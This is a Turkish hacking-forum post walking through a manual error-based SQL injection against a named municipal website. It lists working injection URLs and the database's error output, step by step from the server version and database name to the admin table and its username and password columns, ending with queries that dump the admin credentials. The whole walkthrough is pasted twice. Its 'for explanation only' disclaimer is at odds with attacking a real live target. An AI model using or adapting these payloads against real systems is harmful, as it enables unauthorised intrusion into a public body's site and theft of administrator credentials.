[size=xx-large][font=Courier New, Courier, monospace]TÜRK SİTESİ PAYLAŞMAK FORUM[size=xx-large]UMUZDA YASAKTIR [/font][/size][/size]
⚠️ ÖNEMLİ DUYURU — KİŞİSEL VERİ VE YASADIŞI PAYLAŞIMLAR
Forumda kişisel bilgi (ad, adres, telefon vb.) veya yasa dışı içerik paylaşımı kesinlikle yasaktır. Bu tür paylaşımlar KVKK ve ilgili yasalar gereği suç teşkil eder.
Paylaşım yapan kullanıcıların hesapları kalıcı olarak kapatılacak ve resmî makamlara bildirilecektir. Forum yönetimi, yasal zorunluluklar gereği IP ve oturum kayıtlarını saklamaktadır.
Lütfen gizliliğe ve topluluk kurallarına dikkat ediniz. — Ajanlar.Org Yönetimi
Dursunbey.bel.tr Manuel Sql İnjection
- Konbuyu başlatan Scorpiol
- Başlangıç tarihi
Bakalım
Yeniler Bakabilir. Linklere Kopyalayıp Ne Yaptıgımı Görebilirsiniz. Not= Türk Sitelerinde Denemeyin Anlatım Amaçlıdır.
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- -
Duplicate entry '5.6.41:1' for key 'group_key' (version)
----------------------------------
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
Duplicate entry 'kwwdursu_belediye~1' for key 'group_key' ( Database ismi)
-----------------------------------------
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6b777764757273755f62656c6564697965+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
Duplicate entry 'mia_yonetici~1' for key 'group_key'
db isminin içine girdik şimdi bunlardan tables bulucaz oda LIMIT+0,1 olan yerı 0 ı 1 2 3 4 5 6 dıye veya -1 -2 -3 -4 dıye deiştircez bu ne diye sorucaksanız bunuz yaptıgımzıda tablesleri sırasıyla bıze cıkartıcak dogru olanu bulucaz yani adminle alakalı dogru olan LIMIT+23,1 bu bıze mia_yonetici dıye cıkarttı
--------------------
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x6d69615f796f6e6574696369+AND+table_schema=0x6b777764757273755f62656c6564697965+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
yukarda yaptıgımız 1 2 3 4 5 dıye lazım olan tables ı aynısnı columns dada yapıcaz
LIMIT+1,1), de bıze = Duplicate entry 'k_adi~1' for key 'group_key'
LIMIT+2,1) de bize = Duplicate entry 'sifre~1' for key 'group_key'
yanı k_adi ve sifre diye dump edıcez
---------------
şifresi
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(sifre)+AS+CHAR),0x7e))+FROM+kwwdursu_belediye.mia_yonetici+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
kullanıcı adı
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(k_adi)+AS+CHAR),0x7e))+FROM+kwwdursu_belediye.mia_yonetici+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
bunlarıda tekrar tables ve columnsa yaptıgımız gıbi deiştircez örnek LIMIT+1,1 LIMIT+2,1 LIMIT+3,1 dıye
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- -
Duplicate entry '5.6.41:1' for key 'group_key' (version)
----------------------------------
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
Duplicate entry 'kwwdursu_belediye~1' for key 'group_key' ( Database ismi)
-----------------------------------------
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6b777764757273755f62656c6564697965+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
Duplicate entry 'mia_yonetici~1' for key 'group_key'
db isminin içine girdik şimdi bunlardan tables bulucaz oda LIMIT+0,1 olan yerı 0 ı 1 2 3 4 5 6 dıye veya -1 -2 -3 -4 dıye deiştircez bu ne diye sorucaksanız bunuz yaptıgımzıda tablesleri sırasıyla bıze cıkartıcak dogru olanu bulucaz yani adminle alakalı dogru olan LIMIT+23,1 bu bıze mia_yonetici dıye cıkarttı
--------------------
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x6d69615f796f6e6574696369+AND+table_schema=0x6b777764757273755f62656c6564697965+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
yukarda yaptıgımız 1 2 3 4 5 dıye lazım olan tables ı aynısnı columns dada yapıcaz
LIMIT+1,1), de bıze = Duplicate entry 'k_adi~1' for key 'group_key'
LIMIT+2,1) de bize = Duplicate entry 'sifre~1' for key 'group_key'
yanı k_adi ve sifre diye dump edıcez
---------------
şifresi
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(sifre)+AS+CHAR),0x7e))+FROM+kwwdursu_belediye.mia_yonetici+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
kullanıcı adı
http://www.dursunbey.bel.tr/?modul=yorum&sm=sayfa&si=36' +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(k_adi)+AS+CHAR),0x7e))+FROM+kwwdursu_belediye.mia_yonetici+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)-- -
bunlarıda tekrar tables ve columnsa yaptıgımız gıbi deiştircez örnek LIMIT+1,1 LIMIT+2,1 LIMIT+3,1 dıye